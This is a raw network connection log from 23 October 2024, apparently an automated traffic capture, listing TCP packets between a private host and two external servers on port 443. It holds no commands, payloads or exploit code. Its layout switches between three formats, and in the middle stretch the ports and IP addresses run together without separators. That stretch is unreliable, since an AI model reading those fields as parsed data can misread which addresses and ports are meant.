Oct 23, 2024 07:02:11.040946007 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.040961027 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:11.040968895 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.095067024 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.095110893 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.095185995 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.095782042 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.095803022 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.775098085 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.775187969 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.778940916 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.778955936 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.779201031 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.781496048 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.823328018 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.974647045 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.977082968 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.977117062 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.977190971 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.977224112 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:11.977294922 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:11.977315903 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.091737986 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.091969013 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.093843937 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.093872070 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.093914032 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.094069004 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.094069004 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.094103098 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.094155073 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.096215010 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.096281052 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.096288919 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.096302986 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.096355915 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.209281921 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.209317923 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.209400892 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
Oct 23, 2024 07:02:12.209657907 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.209659100 CEST | 49701 | 443 | 192.168.2.7 | 3.5.3.65
Oct 23, 2024 07:02:12.209693909 CEST | 443 | 49701 | 3.5.3.65 | 192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.210870028 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.210968018 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.211019993 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.211055040 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.211105108 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.212573051 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.212598085 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.212642908 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.212657928 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.212670088 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.212704897 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.214894056 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.214922905 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.214962006 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.214971066 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.215029955 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.215053082 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.215754986 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.215806007 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.217381001 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.217406988 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.217457056 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.217464924 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.217506886 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.259093046 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.325124025 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.325707912 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.325762987 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.325870037 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.325902939 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.325951099 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.327730894 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.327758074 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.327900887 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.327900887 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.327934980 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.327986956 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.328490973 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.330200911 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.330224991 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.330310106 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.330311060 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.330344915 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.330389977 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.331887007 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.331923962 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.331955910 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.331990004 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.332009077 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.332823992 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.332870007 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.332899094 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.332931995 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.332977057 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.333725929 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.333751917 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.333791018 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.333800077 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.333831072 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.333852053 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.334630013 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.335601091 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.335627079 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.335673094 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.335681915 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.335705042 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.335722923 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.337470055 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.337496042 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.337537050 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.337544918 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.337583065 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.337599039 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.337604046 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.338365078 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.338409901 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.338417053 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.338424921 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.338468075 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.338476896 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.340296030 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.340321064 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.340358973 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.340369940 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.340394020 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.386145115 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.386176109 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.434139013 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.442899942 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.442914963 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.442948103 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.442984104 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.443017960 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.443058968 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.444257021 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.444277048 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.444322109 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.444336891 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.444406986 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.444422007 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.444489002 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.444498062 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.444550037 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.445168018 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.445228100 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.445235968 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.446115017 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.446136951 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.446171999 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.446180105 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.446214914 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.447050095 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.447068930 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.447110891 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.447120905 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.447144032 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.447174072 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.448009014 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.448060036 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.448067904 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.448076010 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.448107004 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.449666023 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.449685097 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.449728012 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.449737072 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.449765921 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.449770927 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.449786901 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.449819088 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.450145960 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.450145960 CEST49701443192.168.2.73.5.3.65
                                                                                                                                        Oct 23, 2024 07:02:12.450161934 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.450174093 CEST443497013.5.3.65192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.526362896 CEST49702443192.168.2.7185.166.143.48
                                                                                                                                        Oct 23, 2024 07:02:12.526391983 CEST44349702185.166.143.48192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.526496887 CEST49702443192.168.2.7185.166.143.48
                                                                                                                                        Oct 23, 2024 07:02:12.526696920 CEST49702443192.168.2.7185.166.143.48
                                                                                                                                        Oct 23, 2024 07:02:12.526765108 CEST44349702185.166.143.48192.168.2.7
                                                                                                                                        Oct 23, 2024 07:02:12.526837111 CEST49702443192.168.2.7185.166.143.48
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 23, 2024 07:02:12.576957941 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:12.576986074 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:12.577111959 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:12.577653885 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:12.577666998 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.431376934 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.431528091 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.433114052 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.433129072 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.433444023 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.435139894 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.475338936 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.855597019 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.855619907 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.855669022 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.855736971 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.855736971 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.855978012 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.855999947 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.856316090 CEST  49703        443        192.168.2.7     185.166.143.48
Oct 23, 2024 07:02:13.856319904 CEST  443          49703      185.166.143.48  192.168.2.7
Oct 23, 2024 07:02:13.857868910 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:13.857903004 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:13.858004093 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:13.858701944 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:13.858722925 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.531085968 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.531333923 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.532532930 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.532541037 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.532771111 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.534223080 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.579325914 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.741914034 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.745028973 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.745053053 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.745186090 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.745197058 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.745260954 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.747153044 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.796150923 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.864137888 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.864172935 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.864219904 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.864243031 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.864255905 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.864272118 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.864278078 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.864291906 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.864348888 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.864361048 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.865127087 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.865168095 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.865238905 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.865250111 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.865272045 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.908406019 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.908413887 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.956172943 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.976541996 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.976576090 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.976622105 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.976664066 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.976692915 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.976692915 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.976703882 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.976773024 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.976777077 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.977794886 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.977849007 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.977902889 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.977907896 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.977951050 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.979528904 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.979577065 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.979635954 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.979640961 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.979650974 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.980637074 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.980684996 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.980725050 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.980730057 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.980856895 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.981406927 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.981759071 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:14.981770039 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:14.981831074 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.010776997 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.010821104 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.010881901 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.010915041 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.010921001 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.011183023 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.093919992 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.093985081 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.094044924 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.094055891 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.094106913 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.094961882 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.095004082 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.095068932 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.095077038 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.095134974 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.096121073 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.096165895 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.096214056 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.096220970 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.096234083 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.096908092 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.096949100 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.097002029 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.097009897 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.097155094 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.098913908 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.098961115 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.098994017 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.098999977 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.099070072 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.099075079 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.099809885 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.099858046 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.099891901 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.099896908 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.099932909 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.099956989 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.100585938 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.100626945 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.100699902 CEST  443          49704      3.5.3.65        192.168.2.7
Oct 23, 2024 07:02:15.100724936 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.100724936 CEST  49704        443        192.168.2.7     3.5.3.65
Oct 23, 2024 07:02:15.100730896 CEST  443          49704      3.5.3.65        192.168.2.7
